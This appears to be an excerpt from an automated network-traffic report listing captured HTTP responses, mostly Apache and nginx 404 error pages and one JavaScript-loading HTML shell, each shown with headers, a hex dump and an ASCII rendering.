Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Mar 2025 12:02:05 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Mar 2025 12:02:07 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Mar 2025 12:02:10 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Mar 2025 12:02:16 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Mar 2025 12:02:18 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Mar 2025 12:02:21 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Mar 2025 12:02:24 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Mar 2025 12:02:29 GMTServer: ApacheConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 63 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 45 6e 74 72 79 50 6f 69 6e 74 2f 6c 69 62 2f 62 6c 75 65 62 69 72 64 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 45 6e 74 72 79 50 6f 69 6e 74 2f 6c 69 62 2f 74 73 6c 69 62 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 45 6e 74 72 79 50 6f 69 6e 74 2f 6c 69 62 2f 6d 61 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 45 6e 74 72 79 50 6f 69 6e 74 2f 6c 69 62 2f 6d 6f 6d 65 6e 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 50 6c 75 67 69 6e 2f 4c 4f 47 4f 53 65 74 74 69 6e 67 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 45 6e 74 72 79 50 6f 69 6e 74 2f 61 70 70 5f 34 30 35 34 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 1cf<!DOCTYPE html><html><head> <meta charset="utf-8"> <script src="/EntryPoint/lib/bluebird.min.js"></script> <script src="/EntryPoint/lib/tslib.js"></script> <script src="/EntryPoint/lib/main.js"></script> <script src="/EntryPoint/lib/moment.js"></script> <script src="/Plugin/LOGOSetting.js" charset="utf-8"></script> <script src="/EntryPoint/app_4054.js"></script></head><body> <div id="content"></div></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Mar 2025 12:02:32 GMTServer: ApacheConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 63 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 45 6e 74 72 79 50 6f 69 6e 74 2f 6c 69 62 2f 62 6c 75 65 62 69 72 64 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 45 6e 74 72 79 50 6f 69 6e 74 2f 6c 69 62 2f 74 73 6c 69 62 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 45 6e 74 72 79 50 6f 69 6e 74 2f 6c 69 62 2f 6d 61 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 45 6e 74 72 79 50 6f 69 6e 74 2f 6c 69 62 2f 6d 6f 6d 65 6e 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 50 6c 75 67 69 6e 2f 4c 4f 47 4f 53 65 74 74 69 6e 67 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 45 6e 74 72 79 50 6f 69 6e 74 2f 61 70 70 5f 34 30 35 34 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 1cf<!DOCTYPE html><html><head> <meta charset="utf-8"> <script src="/EntryPoint/lib/bluebird.min.js"></script> <script src="/EntryPoint/lib/tslib.js"></script> <script src="/EntryPoint/lib/main.js"></script> <script src="/EntryPoint/lib/moment.js"></script> <script src="/Plugin/LOGOSetting.js" charset="utf-8"></script> <script src="/EntryPoint/app_4054.js"></script></head><body> <div id="content"></div></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Mar 2025 12:02:35 GMTServer: ApacheConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 63 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 45 6e 74 72 79 50 6f 69 6e 74 2f 6c 69 62 2f 62 6c 75 65 62 69 72 64 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 45 6e 74 72 79 50 6f 69 6e 74 2f 6c 69 62 2f 74 73 6c 69 62 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 45 6e 74 72 79 50 6f 69 6e 74 2f 6c 69 62 2f 6d 61 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 45 6e 74 72 79 50 6f 69 6e 74 2f 6c 69 62 2f 6d 6f 6d 65 6e 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 50 6c 75 67 69 6e 2f 4c 4f 47 4f 53 65 74 74 69 6e 67 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 45 6e 74 72 79 50 6f 69 6e 74 2f 61 70 70 5f 34 30 35 34 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 1cf<!DOCTYPE html><html><head> <meta charset="utf-8"> <script src="/EntryPoint/lib/bluebird.min.js"></script> <script src="/EntryPoint/lib/tslib.js"></script> <script src="/EntryPoint/lib/main.js"></script> <script src="/EntryPoint/lib/moment.js"></script> <script src="/Plugin/LOGOSetting.js" charset="utf-8"></script> <script src="/EntryPoint/app_4054.js"></script></head><body> <div id="content"></div></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Mar 2025 12:02:38 GMTServer: ApacheConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 63 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 45 6e 74 72 79 50 6f 69 6e 74 2f 6c 69 62 2f 62 6c 75 65 62 69 72 64 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 45 6e 74 72 79 50 6f 69 6e 74 2f 6c 69 62 2f 74 73 6c 69 62 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 45 6e 74 72 79 50 6f 69 6e 74 2f 6c 69 62 2f 6d 61 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 45 6e 74 72 79 50 6f 69 6e 74 2f 6c 69 62 2f 6d 6f 6d 65 6e 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 50 6c 75 67 69 6e 2f 4c 4f 47 4f 53 65 74 74 69 6e 67 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 45 6e 74 72 79 50 6f 69 6e 74 2f 61 70 70 5f 34 30 35 34 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 1cf<!DOCTYPE html><html><head> <meta charset="utf-8"> <script src="/EntryPoint/lib/bluebird.min.js"></script> <script src="/EntryPoint/lib/tslib.js"></script> <script src="/EntryPoint/lib/main.js"></script> <script src="/EntryPoint/lib/moment.js"></script> <script src="/Plugin/LOGOSetting.js" charset="utf-8"></script> <script src="/EntryPoint/app_4054.js"></script></head><body> <div id="content"></div></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 13 Mar 2025 12:03:46 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f 31 4f c3 30 10 85 f7 fc 8a a3 13 0c f8 d2 2a 03 83 65 09 9a 54 54 0a 25 02 67 60 74 f1 21 57 a4 71 b0 2f 44 fc 7b 9c 54 48 2c 27 bd bb ef 3d bd 93 57 e5 f3 56 bf 35 15 3c ea a7 1a 9a f6 a1 de 6f 61 75 8b b8 af f4 0e b1 d4 e5 e5 b2 11 39 62 75 58 a9 4c 3a 3e 77 4a 3a 32 36 09 3e 71 47 aa c8 0b 38 78 86 9d 1f 7b 2b f1 b2 cc 24 2e 90 3c 7a fb 33 fb d6 ea 1f 93 54 26 07 a5 1d 41 a0 af 91 22 93 85 f6 a5 86 c9 44 e8 13 f7 31 73 e0 7b 60 77 8a 10 29 7c 53 10 12 87 39 29 a4 61 ac 0d 14 a3 ba 1f cc bb 23 dc 88 42 14 6b b8 6e 8f 63 cf e3 0d bc 2e 06 30 0c d3 34 89 cf ce c4 28 98 cc 19 1a 1f 18 ee 72 89 7f 01 a9 e7 d2 30 75 9a 3f cb 7e 01 ea f2 fe f1 14 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e8M1O0*eTT%g`t!Wq/D{TH,'=WV5<oau9buXL:>wJ:26>qG8x{+$.<z3T&A"D1s{`w)\|S9)a#Bknc.04(r0u?~0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 13 Mar 2025 12:03:49 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f 31 4f c3 30 10 85 f7 fc 8a a3 13 0c f8 d2 2a 03 83 65 09 9a 54 54 0a 25 02 67 60 74 f1 21 57 a4 71 b0 2f 44 fc 7b 9c 54 48 2c 27 bd bb ef 3d bd 93 57 e5 f3 56 bf 35 15 3c ea a7 1a 9a f6 a1 de 6f 61 75 8b b8 af f4 0e b1 d4 e5 e5 b2 11 39 62 75 58 a9 4c 3a 3e 77 4a 3a 32 36 09 3e 71 47 aa c8 0b 38 78 86 9d 1f 7b 2b f1 b2 cc 24 2e 90 3c 7a fb 33 fb d6 ea 1f 93 54 26 07 a5 1d 41 a0 af 91 22 93 85 f6 a5 86 c9 44 e8 13 f7 31 73 e0 7b 60 77 8a 10 29 7c 53 10 12 87 39 29 a4 61 ac 0d 14 a3 ba 1f cc bb 23 dc 88 42 14 6b b8 6e 8f 63 cf e3 0d bc 2e 06 30 0c d3 34 89 cf ce c4 28 98 cc 19 1a 1f 18 ee 72 89 7f 01 a9 e7 d2 30 75 9a 3f cb 7e 01 ea f2 fe f1 14 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 